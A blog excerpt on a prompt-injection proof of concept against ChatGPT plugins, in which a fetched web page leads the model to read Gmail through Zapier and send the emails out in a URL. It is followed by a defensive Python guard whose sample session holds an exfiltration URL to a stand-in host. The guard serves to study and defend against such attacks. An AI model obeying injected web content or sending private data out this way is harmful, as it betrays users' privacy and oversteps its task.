Let ChatGPT visit a website and have your email stolen
Simon Willison's Weblog simonwillison.net
Johann Rehberger provides a screenshot of the first working proof of concept I've seen of a prompt injection attack against ChatGPT Plugins that demonstrates exfiltration of private data. He uses the WebPilot plugin to retrieve a web page containing an injection attack, which triggers the Zapier plugin to retrieve latest emails from Gmail, then exfiltrate the data by sending it to a URL with another WebPilot call.
Johann hasn't shared …
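A defensive sketch of the chain described above, added here as an example and not part of the original post or of any plugin's code: a per-session guard that tracks when untrusted web content and private data have entered the model's context and gates the tool calls that follow. The tool names (`web_fetch`, `email_read`), the three decisions and the sample session are all assumptions constructed for illustration.

```python
from dataclasses import dataclass, field
from urllib.parse import unquote

# Hypothetical tool names and categories, chosen for this example.
UNTRUSTED_SOURCES = {"web_fetch"}   # output may contain injected instructions
PRIVATE_SOURCES = {"email_read"}    # output is the user's private data
OUTBOUND_SINKS = {"web_fetch"}      # argument (a URL) leaves the trust boundary

@dataclass
class SessionGuard:
    untrusted_seen: bool = False
    private_tokens: set = field(default_factory=set)

    def check(self, tool: str, arg: str) -> str:
        """Decide before a tool call runs: 'allow', 'confirm' or 'block'."""
        if tool in OUTBOUND_SINKS and self.private_tokens:
            url = unquote(arg).lower()
            if any(tok in url for tok in self.private_tokens):
                return "block"      # private text literally present in the URL
            return "confirm"        # encoded leaks are possible; ask the user
        if tool in PRIVATE_SOURCES and self.untrusted_seen:
            return "confirm"        # the model may be following injected text
        return "allow"

    def record(self, tool: str, result: str) -> None:
        """Update taint state after a tool call has returned."""
        if tool in UNTRUSTED_SOURCES:
            self.untrusted_seen = True
        if tool in PRIVATE_SOURCES:
            self.private_tokens |= {w.lower() for w in result.split() if len(w) >= 6}

def replay(calls):
    """Replay (tool, arg, result) triples; return the decision for each call."""
    guard, decisions = SessionGuard(), []
    for tool, arg, result in calls:
        decision = guard.check(tool, arg)
        decisions.append(decision)
        if decision != "block":     # assume the user approved any 'confirm'
            guard.record(tool, result)
    return decisions

# Constructed session mirroring the chain described above.
SAMPLE = [
    ("web_fetch", "https://blog.example/post", "page text with hidden instructions"),
    ("email_read", "latest", "Your reset code is 493021-ALPHA"),
    ("web_fetch", "https://collector.example/log?d=reset%20code%20493021-ALPHA", ""),
]

if __name__ == "__main__":
    print(replay(SAMPLE))
```

The literal-substring match only catches unencoded leaks, which is why every outbound call made after a private read falls back to user confirmation.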